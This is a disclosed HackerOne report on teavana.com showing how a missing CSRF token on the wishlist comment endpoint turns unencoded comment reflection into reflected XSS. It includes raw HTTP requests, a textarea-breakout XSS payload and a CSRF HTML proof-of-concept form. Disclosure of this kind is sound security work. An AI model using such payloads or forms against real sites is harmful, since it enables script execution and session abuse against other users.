Starbucks: Reflected XSS by exploiting CSRF vulnerability on teavana.com wishlist comment module. (wishlist-comments)

2016-10-22T10:40:41
ID H1:177508
Type hackerone
Reporter faisalahmed
Modified 2017-02-13T22:48:34

Description

Users can add comments to items on their wishlist. The HTTP request that adds a comment to a wishlist item looks like this:

```http
POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1
Host: www.teavana.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.teavana.com/us/en/my-wishlist
Content-Length: 55
Cookie: REDACTED
Connection: close

wishlistComment=:comment_string
```

The value of the `wishlistComment` parameter is reflected in the returned HTML snippet as below:

```html
<textarea maxlength="150" onkeyup="return ismaxlength(this);" id="wishlistComment" name="wishlistComment" cols="60" rows="12"> :comment_string </textarea>
```

The reflected value is not HTML-encoded. A comment containing a closing `</textarea>` tag therefore breaks out of the textarea, and any markup that follows it is parsed as HTML, so a submitted HTML/JavaScript payload is returned in the response and executed.

Vulnerable request:

```http
POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1
Host: www.teavana.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.teavana.com/us/en/my-wishlist
Content-Length: 55
Cookie: REDACTED
Connection: close

wishlistComment=</textarea><img+src=x+onerror=alert(1)>
```

Response:

```html
<textarea maxlength="150" onkeyup="return ismaxlength(this);" id="wishlistComment" name="wishlistComment" cols="60" rows="12"> </textarea><img src=x onerror=alert(1)> </textarea>
```

The comment-adding POST request carries no CSRF token, so a third-party page can submit it on behalf of any logged-in user. Because the endpoint then renders the unencoded payload in its response, the CSRF flaw turns what would otherwise be a self-XSS into a reflected XSS exploitable against other users.

CSRF to XSS PoC

```html
<html>
  <body>
    <form action="https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id" method="POST">
      <input type="hidden" name="wishlistComment" value="&lt;&#47;textarea&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

Replace `:id` with the target wishlist ID (for testing, your own, e.g. C1005285074) and open the page while logged in to teavana.com. The form posts to www.teavana.com, the response is rendered at that origin, and the JavaScript executes, popping an alert box. Note that the PoC is tied to one specific wishlist ID, so an attacker needs the victim's wishlist ID to target them.

{F129593}